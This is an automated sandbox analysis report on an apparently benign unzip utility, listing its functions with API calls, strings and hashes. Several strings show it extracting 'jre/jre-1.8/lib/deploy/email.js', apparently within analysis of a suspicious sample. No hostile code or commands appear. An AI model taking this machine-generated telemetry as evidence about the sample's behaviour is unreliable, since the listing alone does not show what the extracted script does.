Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$_isatty
String ID: $ $ $ $ $ $%
API String ID: 477621036-857323566
Opcode ID: de4d32f5c7f53cf54bbb7f418697186ffc86207b7bd450dd652535d249acf30f
Instruction ID: 0fc360f5eeb46f85f81fd59aa85371372ac5304b4c265718f1b0a875ff59e0ca
Opcode Fuzzy Hash: de4d32f5c7f53cf54bbb7f418697186ffc86207b7bd450dd652535d249acf30f
Instruction Fuzzy Hash: 28D1FCB060A7119BD310DF15D54821FBBE0FB94754F90C82EE8846B3A1DBF89849CF9A

Function 0041019E Relevance: 25.7, APIs: 6, Strings: 11, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 0040F380: mblen.MSVCRT ref: 0040F3AF

sprintf.MSVCRT ref: 0040FF40
sprintf.MSVCRT ref: 0040FF90
sprintf.MSVCRT ref: 0040FFE0
sprintf.MSVCRT ref: 0041003A
sprintf.MSVCRT ref: 0041008A
sprintf.MSVCRT ref: 004101F2

Strings

%d archive%s successfully processed., xrefs: 0040FF2D
%s: cannot find any matches for wildcard specification "%s"., xrefs: 004101E3
%d "zipfiles" were directories., xrefs: 00410073
zipinfo, xrefs: 004101DA
was, xrefs: 0040FF19
%d archive%s had warnings but no fatal errors., xrefs: 0040FF81
s were, xrefs: 0040FF20
%d archive%s had fatal errors., xrefs: 0040FFD1
%, xrefs: 0040FF59, 0040FFA9, 0040FFF9, 00410053, 004100A3, 0041020B
unzip, xrefs: 0041021D
%d file%s had no zipfile directory., xrefs: 00410027

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$mblen
String ID: was$%$%d "zipfiles" were directories.$%d archive%s had fatal errors.$%d archive%s had warnings but no fatal errors.$%d archive%s successfully processed.$%d file%s had no zipfile directory.$%s: cannot find any matches for wildcard specification "%s".$s were$unzip$zipinfo
API String ID: 1822197146-2659945488
Opcode ID: 78f524965bee002fbd01c9cb02cdd1be610b556708728ab23ea6ed53b421d76b
Instruction ID: 389c88aec209241fb51bf6eabf71117d64b75822d4b9ae4bb0285cbe25640703
Opcode Fuzzy Hash: 78f524965bee002fbd01c9cb02cdd1be610b556708728ab23ea6ed53b421d76b
Instruction Fuzzy Hash: 5A61EB706097159BC3249F15D44421FBBE0EB84758F94C83FE98867751D7BD88888F9E

Function 0041CB30 Relevance: 25.6, APIs: 17, Instructions: 145synchronizationmemorystringCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 0041CB5B
InterlockedExchange.KERNEL32 ref: 0041CB74
InterlockedExchange.KERNEL32 ref: 0041CB91
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,0041C896), ref: 0041CB9C
WaitForSingleObject.KERNEL32 ref: 0041CBAF
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041C896), ref: 0041CBBA
lstrlenA.KERNEL32(00439700,?,0041C896), ref: 0041CBDC
GetSecurityDescriptorLength.ADVAPI32(?,?,?,0041C896), ref: 0041CBEE
GetProcessHeap.KERNEL32(?,?,?,?,0041C896), ref: 0041CBFF
HeapAlloc.KERNEL32 ref: 0041CC13
memcpy.MSVCRT(?,?,?,?,?,?,?,0041C896), ref: 0041CC4D
memcpy.MSVCRT(?,?,?,?,?,?,?,0041C896), ref: 0041CC99
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041C896), ref: 0041CCA5
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0041C896), ref: 0041CCCA
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041C896), ref: 0041CCF6
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0041C896), ref: 0041CD05
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,0041C896), ref: 0041CD48

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: CriticalSection$Mutex$ExchangeHeapInitializeInterlockedReleasememcpy$AllocCloseCreateDescriptorEnterHandleLeaveLengthObjectProcessSecuritySingleWaitlstrlen
String ID:
API String ID: 550299256-0
Opcode ID: c83d07a04941a75c7024785acbffa529b6ed4b86d31ea2d6ff687d3a1bb65cd4
Instruction ID: 42a720ff06e6d7691b4b2abe231bbd4f031d05cf0fa8b2105d54748070386412
Opcode Fuzzy Hash: c83d07a04941a75c7024785acbffa529b6ed4b86d31ea2d6ff687d3a1bb65cd4
Instruction Fuzzy Hash: C15193F1A087118BD710BF39E58125ABBE0AF44354F42897EE8888B345D77CD858CB9B

Function 004234E0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 155stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00423537
sprintf.MSVCRT ref: 00423586
_errno.MSVCRT ref: 00423598
strlen.MSVCRT ref: 0042374A

Strings

file, xrefs: 0042350C
/tmp, xrefs: 0042360F, 00423621, 00423645
TEMP, xrefs: 004235C2, 00423602, 0042366C, 00423726
TMPDIR, xrefs: 00423680
%.*s/%.*sXXXXXX, xrefs: 0042357B
TMP, xrefs: 00423710

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strlen$_errnosprintf
String ID: %.*s/%.*sXXXXXX$/tmp$TEMP$TMP$TMPDIR$file
API String ID: 84076277-3478160846
Opcode ID: 88578efb579225f99f8cf724730ca9668e0f35c46f55c094e5b6efcc1850fc0c
Instruction ID: 0fe25e470ef5cd2e8a9b154964104d5f836d3fbfc90f82a8d19503f48686e889
Opcode Fuzzy Hash: 88578efb579225f99f8cf724730ca9668e0f35c46f55c094e5b6efcc1850fc0c
Instruction Fuzzy Hash: 73516CB07093619AD730AF16E44036BB6F1AF84746FC5886FD9CC97341E77C8A818B4A

Function 00420C40 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 100stringlibraryloaderCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00420C71
GetModuleHandleA.KERNEL32 ref: 00420CBB
GetProcAddress.KERNEL32 ref: 00420CD0
FreeLibrary.KERNEL32 ref: 00420D0E
strrchr.MSVCRT ref: 00420D37
strstr.MSVCRT ref: 00420D4F
strstr.MSVCRT ref: 00420D6F

Strings

., xrefs: 00420D2C
KERNEL32.DLL, xrefs: 00420CB4
PK, xrefs: 00420CF8, 00420D46, 00420D8C, 00420D9F
GetBinaryTypeA, xrefs: 00420CC5
PATHEXT, xrefs: 00420D80
.lnk, xrefs: 00420C82

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strrchrstrstr$AddressFreeHandleLibraryModuleProc
String ID: .$.lnk$GetBinaryTypeA$KERNEL32.DLL$PATHEXT$PK
API String ID: 164240146-2437200041
Opcode ID: f7568c60e9876ae0e3e7543ce56cd4c511dc17ec20e25d3ddf4711c7c041968e
Instruction ID: adda390424aae3c330cc19e12383c3e4bdc7b3033fa3125a870ef821abfbbec0
Opcode Fuzzy Hash: f7568c60e9876ae0e3e7543ce56cd4c511dc17ec20e25d3ddf4711c7c041968e
Instruction Fuzzy Hash: 583180B07097258BD320AF26B54032BBAE4BF84704F954A2EDC8497342E77CD9458B4B

Function 00401280 Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 79COMMON

Download Yara Rule

APIs

FindAtomA.KERNEL32 ref: 004256FE
malloc.MSVCRT ref: 00425715

Strings

-LIBGCCW32-EH-SJLJ-GTHR-MINGW32, xrefs: 00425687
AAAA, xrefs: 004256C2
AAAA, xrefs: 004256D1
AAAA, xrefs: 00425696
AAAA, xrefs: 0042568F
AAAA, xrefs: 00425680
AAAA, xrefs: 004256AC
AAAA, xrefs: 004256A5
AAAA, xrefs: 004256BB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: AtomFindmalloc
String ID: -LIBGCCW32-EH-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
API String ID: 2044834943-4001291843
Opcode ID: bbd9ea875a069a5f433a98a55718dcb26de2c7ae2824419577d1b9854d980aac
Instruction ID: f980c1975d2fba46173183872f9ba163600afa3974f3bec7220e9a2114ac0c20
Opcode Fuzzy Hash: bbd9ea875a069a5f433a98a55718dcb26de2c7ae2824419577d1b9854d980aac
Instruction Fuzzy Hash: 9031FBB4B00718DFCB10EFA5E9886ADBBF4BB08344F85056ED854A7315D7389941CF99

Function 00422510 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 340stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 0042255B
strchr.MSVCRT ref: 0042259B
strspn.MSVCRT ref: 004225EA
strchr.MSVCRT ref: 00422610
sscanf.MSVCRT ref: 0042279E
strspn.MSVCRT ref: 00422804
strspn.MSVCRT ref: 00422875
strspn.MSVCRT ref: 004228E6

Strings

otset, xrefs: 00422511

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strspn$strchr$sscanfstrcmp
String ID: otset
API String ID: 3147449385-541645956
Opcode ID: 54c9018d4ec77b0dc09c513cec228a75ed51852a3e65a6251dd2ec8784c396ce
Instruction ID: b594eb57860b7f7d754393745262ee5c010916f73f21b821fb239b5645f86ece
Opcode Fuzzy Hash: 54c9018d4ec77b0dc09c513cec228a75ed51852a3e65a6251dd2ec8784c396ce
Instruction Fuzzy Hash: 7BD19670B097A2AED7219F24A604326FBE07B55348F94C59FD4C44B352D3BC9886CB8A

Function 00417930 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

_isctype.MSVCRT ref: 00417955
_isctype.MSVCRT ref: 00417980
_isctype.MSVCRT ref: 004179AB
_isctype.MSVCRT ref: 004179D6
_isctype.MSVCRT ref: 00417A01
_isctype.MSVCRT ref: 00417A2C
_isctype.MSVCRT ref: 00417A57
_isctype.MSVCRT ref: 00417A84
sprintf.MSVCRT ref: 00417AF3
sprintf.MSVCRT ref: 00417B6B

Strings

. The associated file has type code `0x%lx' and creator code `0x%lx', xrefs: 00417ADE
. The associated file has type code `%c%c%c%c' and creator code `%c%c%c%c', xrefs: 00417B58
%, xrefs: 00417B0C

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _isctype$sprintf
String ID: %$. The associated file has type code `%c%c%c%c' and creator code `%c%c%c%c'$. The associated file has type code `0x%lx' and creator code `0x%lx'
API String ID: 981745487-3686066513
Opcode ID: 3b966cb8f44d3e7d47015c01c49946ce0f73d4149f271560faf0bb07365eb752
Instruction ID: da62cead2ee338f822b1730a5310140b708544fe3f07b0fddefe437719b9809b
Opcode Fuzzy Hash: 3b966cb8f44d3e7d47015c01c49946ce0f73d4149f271560faf0bb07365eb752
Instruction Fuzzy Hash: 1881AEB410C6A0CAC3048F15D8905797BF1AF8530AF48C4AEE8D54F3A6D73CC955EB26

Function 004090E0 Relevance: 22.8, APIs: 10, Strings: 5, Instructions: 293COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0040911D
sprintf.MSVCRT ref: 0040923B
sprintf.MSVCRT ref: 00409289
sprintf.MSVCRT ref: 004092DB
sprintf.MSVCRT ref: 0040930C

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 004092E5, 0040955F, 0040960B
%-22s , xrefs: 004092FD, 00409577, 00409623
OK, xrefs: 0040910E
%, xrefs: 00409136, 00409254, 00409325, 00409435, 0040959F, 004095F4, 0040964B
jre/jre-1.8/lib/deploy/email.js, xrefs: 004092ED, 00409567, 00409613

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: OK$%$%-22s $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 590974362-635822277
Opcode ID: 556e8e0abf564527ed4d8a9877a50fb5ffef6eb3eb0c87c1c6d83a96a3bacaef
Instruction ID: 14f76d1b7a033bd7d433d7e96095e6bc29f4d9a782ff0795c434566ac0aceeec
Opcode Fuzzy Hash: 556e8e0abf564527ed4d8a9877a50fb5ffef6eb3eb0c87c1c6d83a96a3bacaef
Instruction Fuzzy Hash: 2EC12DB0509711ABD7109F15D58826EBBE0EB84354F51C82FE8896B392D7BD8C84DB8F

Function 0040855D Relevance: 22.8, APIs: 6, Strings: 9, Instructions: 276COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00408749
sprintf.MSVCRT ref: 004087ED
sprintf.MSVCRT ref: 00408854
sprintf.MSVCRT ref: 004088ED
sprintf.MSVCRT ref: 0040879E

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

Strings

[text] , xrefs: 004089DE
jre/jre-1.8/lib/deploy/email.js, xrefs: 004087C6, 004088C1, 0040893C
%-22s , xrefs: 004087DE
[binary], xrefs: 004089D7
OK, xrefs: 00408845
[empty] , xrefs: 004089E5
extract, xrefs: 0040897F
%, xrefs: 00408762, 004087B7, 00408806, 0040886D, 004089AF
jre/jre-1.8/lib/deploy/email.js, xrefs: 004087CE, 004088CE, 00408944

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$Char
String ID: OK$%$%-22s $[binary]$[empty] $[text] $extract$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 4001210701-131234152
Opcode ID: d7bb0fba6abb634d906fe7fc9fec0877eff7477826264329b8136efe58cedc0f
Instruction ID: c8c4ff17a3c3a2aba65037e57da0e7b3ad5952d7b35de0ac047671a8b0ae1bb8
Opcode Fuzzy Hash: d7bb0fba6abb634d906fe7fc9fec0877eff7477826264329b8136efe58cedc0f
Instruction Fuzzy Hash: C6C1A1B060A7519BC3109F25AA4462ABBE0FB90344F54D47FE8C5A73A1DF788845CB9E

Function 00404330 Relevance: 22.7, APIs: 15, Instructions: 223stringCOMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040433E
_isctype.MSVCRT ref: 0040436D
getenv.MSVCRT ref: 00404389
_isctype.MSVCRT ref: 004043BE
strlen.MSVCRT ref: 004043E0
malloc.MSVCRT ref: 004043E9
strcpy.MSVCRT ref: 0040440D
malloc.MSVCRT ref: 0040442E
_isctype.MSVCRT ref: 00404491
mblen.MSVCRT ref: 004044A9
_isctype.MSVCRT ref: 004044E4
mblen.MSVCRT ref: 004044FC

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _isctype$getenvmallocmblen$strcpystrlen
String ID:
API String ID: 2392182867-0
Opcode ID: 0dbceae6330baba4156d74d119f1ce0f1d70cf6c45b2d08948c5485c507b87c9
Instruction ID: 63bb0869bc9db60882b490145e1185ae5ddd2b290b82a75d8ce74bcd24ac8f72
Opcode Fuzzy Hash: 0dbceae6330baba4156d74d119f1ce0f1d70cf6c45b2d08948c5485c507b87c9
Instruction Fuzzy Hash: CF816AB16087119FC7209F25D88032AB7E0BF85308F59497EDAC5AB391E77CD855CB8A

Function 00408B58 Relevance: 21.2, APIs: 5, Strings: 9, Instructions: 190COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00408749
sprintf.MSVCRT ref: 00408BBE
sprintf.MSVCRT ref: 00408C83
sprintf.MSVCRT ref: 00408D70
sprintf.MSVCRT ref: 00408DD0

Strings

[text] , xrefs: 00408E0E
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408CB7, 00408D2E, 00408D7A
[binary], xrefs: 00408E07
warning, xrefs: 00408C58, 00408D09
error, xrefs: 00408C63, 00408D18
%, xrefs: 00408762, 00408BD7, 00408C9C, 00408DE9
not enough memory to , xrefs: 00408B9F, 00408D49
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408CBF, 00408D36, 00408D82
invalid compressed data to , xrefs: 00408BA6, 00408D58

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: %$[binary]$[text] $error$invalid compressed data to $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$not enough memory to $warning
API String ID: 590974362-745875689
Opcode ID: 3c24f6c366b5920a0a506c709b306b9f5345fbbb633b9eb2d254af2c839c6b65
Instruction ID: f9a70e8688e7a3cecfb89107abcbd90104b832cf161044d0355a96eb85ccc6fe
Opcode Fuzzy Hash: 3c24f6c366b5920a0a506c709b306b9f5345fbbb633b9eb2d254af2c839c6b65
Instruction Fuzzy Hash: 86813AB06093119BC710DF19964421EBBE0EB94758F91C93FE8C4AB391DBB88845CF9E

Function 0041C6B0 Relevance: 21.2, APIs: 14, Instructions: 188synchronizationCOMMON

Download Yara Rule

APIs

IsValidSecurityDescriptor.ADVAPI32 ref: 0041C711
CreateMutexA.KERNEL32 ref: 0041C8B7
InterlockedExchange.KERNEL32 ref: 0041C8D0
InterlockedExchange.KERNEL32 ref: 0041C8E9
CloseHandle.KERNEL32 ref: 0041C8F4
WaitForSingleObject.KERNEL32 ref: 0041C907
ReleaseMutex.KERNEL32 ref: 0041C912

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedMutex$CloseCreateDescriptorHandleObjectReleaseSecuritySingleValidWait
String ID:
API String ID: 961646696-0
Opcode ID: fdec1ce0ca469b9cc4dbd1781ab8ec1ae42a3d00286a78e620b1382991aad305
Instruction ID: 08c35760ff08e5e63373fd1f37d7b3150e23ec673cd303c224f5809ef52d329d
Opcode Fuzzy Hash: fdec1ce0ca469b9cc4dbd1781ab8ec1ae42a3d00286a78e620b1382991aad305
Instruction Fuzzy Hash: 31717DB46083018BD310EF29D58575FBBE1BF84748F458A2EE8C457394D7B8D989CB8A

Function 0040BC60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0040BC9A
fflush.MSVCRT ref: 0040BCAB
fprintf.MSVCRT ref: 0040BCF4
fflush.MSVCRT ref: 0040BD05
tolower.MSVCRT ref: 0040BD10
fputc.MSVCRT ref: 0040BD64

Strings

error: zipfile probably corrupt (%s), xrefs: 0040BDB9
, xrefs: 0040BCE0
%, xrefs: 0040BDE1

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: fflushfprintf$fputctolower
String ID: $%$error: zipfile probably corrupt (%s)
API String ID: 3172311155-1199833149
Opcode ID: 5397f39bb1f75f19860b0444d3e9746bc61a8676d5832112e6c903b228bfe4ed
Instruction ID: 2d7a656f89f0ab20d5eb681343d44287d9379f65f196483b09443844103e94f2
Opcode Fuzzy Hash: 5397f39bb1f75f19860b0444d3e9746bc61a8676d5832112e6c903b228bfe4ed
Instruction Fuzzy Hash: 0B51E5715097408BD3209F24E4452ABBBE1FF91314F89892FD0D527392C77C98459BCE

Function 00420AD0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 69stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00420AEC
GetProcAddress.KERNEL32 ref: 00420B01
FreeLibrary.KERNEL32 ref: 00420B36
strrchr.MSVCRT ref: 00420B5B
strstr.MSVCRT ref: 00420B73
strstr.MSVCRT ref: 00420B94

Strings

KERNEL32.DLL, xrefs: 00420AE5
PK, xrefs: 00420B21, 00420B6A, 00420BAC, 00420BBF
., xrefs: 00420B53
GetBinaryTypeA, xrefs: 00420AF6
PATHEXT, xrefs: 00420BA0

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strstr$AddressFreeHandleLibraryModuleProcstrrchr
String ID: .$GetBinaryTypeA$KERNEL32.DLL$PATHEXT$PK
API String ID: 3802487583-989140014
Opcode ID: 81680a9f3437fd69bb165556f2e18a1ddd00e7378da0f9fd448c485fc38acc98
Instruction ID: ed593a68231bd0a995950b3dd1b085430e4121de070b3f25665272c41c7f3443
Opcode Fuzzy Hash: 81680a9f3437fd69bb165556f2e18a1ddd00e7378da0f9fd448c485fc38acc98
Instruction Fuzzy Hash: 4F2141B07083158BD720EF65A58122BBBE4BF84348FC5496EDC8487302E778E845CB9B

Function 00410263 Relevance: 19.6, APIs: 5, Strings: 8, Instructions: 149COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0040FF40
sprintf.MSVCRT ref: 0040FF90
sprintf.MSVCRT ref: 0040FFE0
sprintf.MSVCRT ref: 0041003A

Strings

%d archive%s successfully processed., xrefs: 0040FF2D
%d "zipfiles" were directories., xrefs: 00410073
was, xrefs: 0040FF19
%d archive%s had warnings but no fatal errors., xrefs: 0040FF81
s were, xrefs: 0040FF20
%d archive%s had fatal errors., xrefs: 0040FFD1
%, xrefs: 0040FF59, 0040FFA9, 0040FFF9, 00410053, 004100A3
%d file%s had no zipfile directory., xrefs: 00410027

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
